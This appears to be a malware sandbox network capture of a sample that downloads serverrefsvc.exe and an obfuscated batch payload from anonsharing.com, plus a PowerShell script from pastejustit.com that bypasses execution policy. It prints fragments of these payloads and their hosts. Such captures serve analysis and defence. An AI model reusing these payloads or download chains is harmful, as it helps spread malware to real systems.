Jan 8, 2025 10:16:01.684125900 CET	1.1.1.1	192.168.2.7	0x4b1	No error (0)	sigma.dreamhosters.com		107.180.236.211	A (IP address)	IN (0x0001)	false
Jan 8, 2025 10:16:49.783122063 CET	1.1.1.1	192.168.2.7	0x630a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

anonsharing.com

pastejustit.com

s3.ca-central-1.wasabisys.com

raw.githubusercontent.com

github.com

objects.githubusercontent.com

sigma.dreamhosters.com

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	104.21.32.1	443	7356	C:\Users\user\Desktop\spreadmalware.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:04 UTC	103	OUT	GET /file/13a37f52caaf958b/serverrefsvc.exe HTTP/1.1 Host: anonsharing.com Connection: Keep-Alive
2025-01-08 09:15:04 UTC	1225	IN	HTTP/1.1 302 Found Date: Wed, 08 Jan 2025 09:15:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, no-cache, private Pragma: no-cache Set-Cookie: filehosting=316da48109f021af72b209d9f82a1f62; expires=Thu, 09-Jan-2025 09:15:04 GMT; Max-Age=86400; path=/ Location: https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb Vary: Accept-Encoding,User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsPyBVVb25ijBxJiRyjzyRU9yPr6VkXpyFdKFMSrdjS8uGxOghnaVDr8t0Xl042FhfSpxw%2BS0So0vpWMgIVApkBmjDs39DHYT4VP0qgaujvXSrhi%2FpvEPl7FcCp%2BHY%2Fu%2FSw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb14b87f874344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1698&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=717&delivery_rate=1661923&cwnd=47&unsent_bytes=0&cid=14710c150f0a9cb6&ts=290&x=0"
2025-01-08 09:15:04 UTC	144	IN	Data Raw: 33 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2e 63 Data Ascii: 31a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://anonsharing.c
2025-01-08 09:15:04 UTC	657	IN	Data Raw: 6f 6d 2f 31 33 61 33 37 66 35 32 63 61 61 66 39 35 38 62 2f 73 65 72 76 65 72 72 65 66 73 76 63 2e 65 78 65 3f 64 6f 77 6e 6c 6f 61 64 5f 74 6f 6b 65 6e 3d 38 62 65 38 35 35 61 31 64 37 34 36 63 33 61 38 37 34 32 34 36 34 62 31 65 62 30 63 30 64 65 34 31 38 35 30 62 62 35 65 63 39 33 38 38 34 62 37 33 30 64 33 63 62 38 37 31 61 31 36 39 61 65 62 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2e 63 6f 6d 2f 31 33 61 33 37 66 35 32 63 61 61 66 39 35 38 62 2f 73 65 72 76 65 72 72 65 66 73 76 63 2e 65 78 65 3f 64 6f 77 6e 6c 6f 61 64 5f 74 6f 6b 65 6e 3d 38 62 65 38 35 35 61 31 64 37 34 36 63 33 61 38 37 34 32 34 36 34 62 31 65 62 30 63 30 Data Ascii: om/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb'" /> <title>Redirecting to https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0
2025-01-08 09:15:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	104.21.32.1	443	7356	C:\Users\user\Desktop\spreadmalware.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:05 UTC	154	OUT	GET /13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb HTTP/1.1 Host: anonsharing.com
2025-01-08 09:15:05 UTC	1369	IN	HTTP/1.1 302 Found Date: Wed, 08 Jan 2025 09:15:05 GMT Content-Type: application/x-msdownload Transfer-Encoding: chunked Connection: close Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0, no-cache, private Pragma: public Accept-Ranges: bytes Access-Control-Allow-Origin: https://anonsharing.com Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition, Content-Description Access-Control-Allow-Credentials: true Set-Cookie: filehosting=e0c51384874672905be12ea0332ea02b; expires=Thu, 09-Jan-2025 09:15:05 GMT; Max-Age=86400; path=/ Location: https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?response-content-disposition=filename%3Dserverrefsvc.exe&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091505Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=a701b86e9855f8f42d99b4c0afa6201b71c9dc1e88839b1138571bd7162ff95d Vary: Accept-Encoding,User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfVGpYXZNS5CTVlp5je1fcwauYe84VK670vWgN8AMJepA%2Bxa2vBB77XeACIeFfiGLd%2BX7WYc0XTcuUSwfaOuNLhCVURKzx4GI%2F%2FgSmjAd3LylEo0cM%2BLvj3OD1cZHdEQko0%3D"}],"group":"cf-nel","max_age":604800}
2025-01-08 09:15:05 UTC	362	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 62 31 34 62 63 66 38 31 39 38 63 64 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 35 38 26 6d 69 6e 5f 72 74 74 3d 31 37 35 31 26 72 74 74 5f 76 61 72 3d 36 37 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8feb14bcf8198cda-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1751&rtt_var=672&sent=5&recv=7&lost=0&retrans=0&sent_b
2025-01-08 09:15:05 UTC	1007	IN	Data Raw: 38 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 73 33 2e 63 61 2d 63 65 6e 74 72 61 6c 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2f 39 63 2f 39 63 32 64 66 64 36 36 64 66 36 33 64 34 64 63 35 30 33 65 32 36 66 32 30 39 62 62 31 32 39 34 3f 72 65 73 70 6f 6e 73 65 2d 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3d 66 69 6c 65 6e 61 6d 65 25 33 44 73 65 72 76 65 72 Data Ascii: 866<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?response-content-disposition=filename%3Dserver
2025-01-08 09:15:05 UTC	1150	IN	Data Raw: 3b 58 2d 41 6d 7a 2d 45 78 70 69 72 65 73 3d 31 30 38 30 30 26 61 6d 70 3b 58 2d 41 6d 7a 2d 53 69 67 6e 61 74 75 72 65 3d 61 37 30 31 62 38 36 65 39 38 35 35 66 38 66 34 32 64 39 39 62 34 63 30 61 66 61 36 32 30 31 62 37 31 63 39 64 63 31 65 38 38 38 33 39 62 31 31 33 38 35 37 31 62 64 37 31 36 32 66 66 39 35 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 63 61 2d 63 65 6e 74 72 61 6c 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2f 39 63 2f 39 63 32 64 66 64 36 36 64 66 36 33 64 34 64 63 35 30 33 65 32 36 66 32 30 39 62 62 31 32 39 34 3f Data Ascii: ;X-Amz-Expires=10800&X-Amz-Signature=a701b86e9855f8f42d99b4c0afa6201b71c9dc1e88839b1138571bd7162ff95d</title> </head> <body> Redirecting to <a href="https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?
2025-01-08 09:15:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	178.159.12.230	443	7912	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:08 UTC	174	OUT	GET /raw/msdcgy3bxg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastejustit.com Connection: Keep-Alive
2025-01-08 09:15:08 UTC	1028	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.4.33 cache-control: no-cache, private content-type: text/plain; charset=UTF-8 x-ratelimit-limit: 60 x-ratelimit-remaining: 59 set-cookie: XSRF-TOKEN=eyJpdiI6IjhiWXBSNm5OWDZxbko2NnFSZm5FS1E9PSIsInZhbHVlIjoibTFLR0dKMjRvRXlmN2RXSkVqMzdWbk13SUV0VUMrSjV1NWdzeVwvUXMxU1VyUjRWTE9qTmlDTlZcLzA0S25PazAzIiwibWFjIjoiOTRkYTM5Nzc0ZTM1MTQ0YjkxMjA0ZGM2Y2IxZTU4ZjYwMWI5NGQxMGE5ZWQ2MWEzNzJmMmE5MDRlMzBkZDliOSJ9; expires=Wed, 08-Jan-2025 11:15:08 GMT; Max-Age=7200; path=/; secure set-cookie: pastejustitcom_session=eyJpdiI6IjVIcnRjM3htXC93SDBwK09SVXhOdTRnPT0iLCJ2YWx1ZSI6Imd4SXljeFVIQ3h4NHpDZXJaRE5cLzFGaXJJcnhmdzEwTk94NzZ6UFZZS1FMcWN6MEMwTW1aYnNWV25FbDBncmpYIiwibWFjIjoiYzY2OTNjZjViMGM3ODNmNzFiNWFhNGY5ZjM0YmI1OTdhNzMwYWIxNGUwOGEzNGVhOTc4ZDdjZTQ2YjRkYzdlYyJ9; expires=Wed, 08-Jan-2025 11:15:08 GMT; Max-Age=7200; path=/; httponly; secure content-length: 784 date: Wed, 08 Jan 2025 09:15:08 GMT server: LiteSpeed vary: User-Agent,User-Agent alt-svc: h3-29=":443"; ma=2592000
2025-01-08 09:15:08 UTC	784	IN	Data Raw: 53 65 74 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 53 63 6f 70 65 20 50 72 6f 63 65 73 73 20 2d 46 6f 72 63 65 0d 0a 69 66 20 28 2d 6e 6f 74 20 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 5d 20 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 3a 3a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 29 29 20 7b 0d 0a 20 20 20 20 77 68 69 6c 65 28 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 Data Ascii: Set-ExecutionPolicy Bypass -Scope Process -Forceif (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { while(1) { try {

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49702	104.21.32.1	443	7912	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:09 UTC	199	OUT	GET /file/db59849be6b5f562/skibiditoilet.bat HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: anonsharing.com Connection: Keep-Alive
2025-01-08 09:15:10 UTC	1222	IN	HTTP/1.1 302 Found Date: Wed, 08 Jan 2025 09:15:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, no-cache, private Pragma: no-cache Set-Cookie: filehosting=303b8e278dd1a3280483dd9d259be568; expires=Thu, 09-Jan-2025 09:15:09 GMT; Max-Age=86400; path=/ Location: https://anonsharing.com/db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26 Vary: Accept-Encoding,User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvFh6POQniD9DJR7lP8QPE1OELnkqMpIM%2Faa7720CUf9wWdbE96JpJtk5DRbJ8psZTaqDCIq%2B9DH2kE4nSub2heMLSZKBjpa%2F6xYAJO8sDYMeXmVEuyLkxsuIWEaPuFrNSA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb14dac8844344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1690&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=813&delivery_rate=1712609&cwnd=47&unsent_bytes=0&cid=f4090c8e792d7e9e&ts=244&x=0"
2025-01-08 09:15:10 UTC	805	IN	Data Raw: 33 31 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2e 63 6f 6d 2f 64 62 35 39 38 34 39 62 65 36 62 35 66 35 36 32 2f 73 6b 69 62 69 64 69 74 6f 69 6c 65 74 2e 62 61 74 3f 64 6f 77 6e 6c 6f 61 64 5f 74 6f 6b 65 6e 3d 61 31 65 38 35 35 31 61 32 37 35 34 34 30 61 35 65 34 66 30 38 30 66 38 65 39 37 36 33 65 65 63 36 36 30 63 66 66 35 35 36 62 39 32 30 39 33 32 63 38 63 64 39 34 35 32 32 64 Data Ascii: 31e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://anonsharing.com/db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d
2025-01-08 09:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49704	104.21.32.1	443	7912	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:10 UTC	304	OUT	GET /db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: anonsharing.com Cookie: filehosting=303b8e278dd1a3280483dd9d259be568
2025-01-08 09:15:10 UTC	1367	IN	HTTP/1.1 302 Found Date: Wed, 08 Jan 2025 09:15:10 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0, no-cache, private Pragma: public Accept-Ranges: bytes Access-Control-Allow-Origin: https://anonsharing.com Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition, Content-Description Access-Control-Allow-Credentials: true Location: https://s3.ca-central-1.wasabisys.com/anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibiditoilet.bat&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091510Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=7c5db048caa31fbc29f2feb87c269054c605425e0927bffd5a06dd9b15d3b352 Vary: Accept-Encoding,User-Agent cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EavuKCPCy%2FxHTaXgGldH%2FVegW4g8Ky6cYausOKyB0BIV1a2mx2PWiA43U9HvdpD%2BPhTc2KUuSLgGL2X4VfbX9%2FiUmO5ILi4CG%2BhvzyGKoeBrlGwUDIHdF2EuhdY9wTnaOTI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb14df5baa1875-EWR
2025-01-08 09:15:10 UTC	245	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 34 39 26 6d 69 6e 5f 72 74 74 3d 31 36 34 38 26 72 74 74 5f 76 61 72 3d 36 32 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 37 26 72 65 63 76 5f 62 79 74 65 73 3d 39 34 32 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 35 37 39 37 37 26 63 77 6e 64 3d 31 35 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 39 33 61 37 39 38 63 39 38 63 39 36 61 37 65 26 74 73 3d 33 34 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=942&delivery_rate=1757977&cwnd=153&unsent_bytes=0&cid=393a798c98c96a7e&ts=341&x=0"
2025-01-08 09:15:10 UTC	1126	IN	Data Raw: 38 36 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 73 33 2e 63 61 2d 63 65 6e 74 72 61 6c 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2f 62 38 2f 62 38 62 34 62 66 65 62 64 66 61 63 31 64 36 36 62 65 35 64 33 63 37 35 64 64 34 61 30 36 63 66 3f 72 65 73 70 6f 6e 73 65 2d 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3d 66 69 6c 65 6e 61 6d 65 25 33 44 73 6b 69 62 69 64 Data Ascii: 86a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://s3.ca-central-1.wasabisys.com/anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibid
2025-01-08 09:15:10 UTC	1035	IN	Data Raw: 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 63 61 2d 63 65 6e 74 72 61 6c 2d 31 2e 77 61 73 61 62 69 73 79 73 2e 63 6f 6d 2f 61 6e 6f 6e 73 68 61 72 69 6e 67 2f 62 38 2f 62 38 62 34 62 66 65 62 64 66 61 63 31 64 36 36 62 65 35 64 33 63 37 35 64 64 34 61 30 36 63 66 3f 72 65 73 70 6f 6e 73 65 2d 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3d 66 69 6c 65 6e 61 6d 65 25 33 44 73 6b 69 62 69 64 69 74 6f 69 6c 65 74 2e 62 61 74 26 61 6d 70 3b 58 2d 41 6d 7a 2d 43 6f 6e 74 65 6e 74 2d 53 68 61 32 35 36 3d 55 4e 53 49 47 4e 45 44 2d 50 41 59 4c 4f 41 44 26 61 6d 70 3b 58 2d 41 6d 7a 2d 41 6c 67 6f 72 69 74 Data Ascii: </head> <body> Redirecting to <a href="https://s3.ca-central-1.wasabisys.com/anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibiditoilet.bat&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorit
2025-01-08 09:15:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49705	38.143.146.102	443	7912	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:11 UTC	585	OUT	GET /anonsharing/b8/b8b4bfebdfac1d66be5d3c75dd4a06cf?response-content-disposition=filename%3Dskibiditoilet.bat&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=HSRJ9W5CR8WH0842044I%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091510Z&X-Amz-SignedHeaders=host&X-Amz-Expires=10800&X-Amz-Signature=7c5db048caa31fbc29f2feb87c269054c605425e0927bffd5a06dd9b15d3b352 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: s3.ca-central-1.wasabisys.com Connection: Keep-Alive
2025-01-08 09:15:11 UTC	575	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Connection: close Content-Disposition: filename=skibiditoilet.bat Content-Length: 106527 Content-Type: application/octet-stream Date: Wed, 08 Jan 2025 09:15:11 GMT ETag: "8158350247e35657cbccf5054d8a6d33" Last-Modified: Sat, 28 Dec 2024 04:44:53 GMT Server: WasabiS3/7.21.4957-2024-11-21-b4e1fb3b50 x-amz-id-2: oSm9yPS0og5KjMQxSTzaAb4f0ADriIbLKVO98IlTRRxOFTf/WGEG1uBxPcpNcWgjIigpSd6hKitD x-amz-request-id: 1BC835CC36C34AC4:B x-wasabi-cm-reference-id: 1736327711190 38.143.146.102 ConID:902965873/EngineConID:8725545/Core:6
2025-01-08 09:15:11 UTC	15809	IN	Data Raw: 25 67 74 49 57 44 6e 6e 4e 69 25 40 25 68 4c 61 70 77 74 6c 25 25 4b 4a 6e 62 4c 52 58 76 25 65 25 5a 78 6a 76 6d 45 50 25 25 74 67 51 44 77 61 5a 25 63 25 62 4d 55 61 6d 4f 7a 66 66 25 25 56 4f 56 78 44 6e 4f 25 68 25 77 6e 73 51 76 49 53 64 4b 25 25 43 72 43 6a 47 56 51 64 42 25 6f 25 43 7a 58 53 54 44 6b 61 25 20 25 64 42 71 4a 67 6e 6b 43 25 6f 25 65 57 6a 74 73 69 52 55 48 25 25 4f 4e 73 4a 49 68 57 59 25 66 25 46 7a 51 6a 5a 41 4e 44 25 25 72 44 4a 64 6a 71 78 25 66 25 76 71 63 5a 75 43 6f 25 20 0d 0a 0d 0a 25 4c 46 71 57 6d 52 4a 45 6c 25 65 25 63 43 4a 4e 75 72 75 6e 6b 25 25 44 50 54 76 54 69 61 63 59 25 63 25 67 67 70 78 44 66 78 25 25 65 6a 4f 5a 79 61 75 54 25 68 25 7a 50 55 43 6c 69 56 25 25 6f 4d 44 50 4f 44 53 25 6f 25 4d 66 75 4b 58 4a 57 Data Ascii: %gtIWDnnNi%@%hLapwtl%%KJnbLRXv%e%ZxjvmEP%%tgQDwaZ%c%bMUamOzff%%VOVxDnO%h%wnsQvISdK%%CrCjGVQdB%o%CzXSTDka% %dBqJgnkC%o%eWjtsiRUH%%ONsJIhWY%f%FzQjZAND%%rDJdjqx%f%vqcZuCo% %LFqWmRJEl%e%cCJNurunk%%DPTvTiacY%c%ggpxDfx%%ejOZyauT%h%zPUCliV%%oMDPODS%o%MfuKXJW
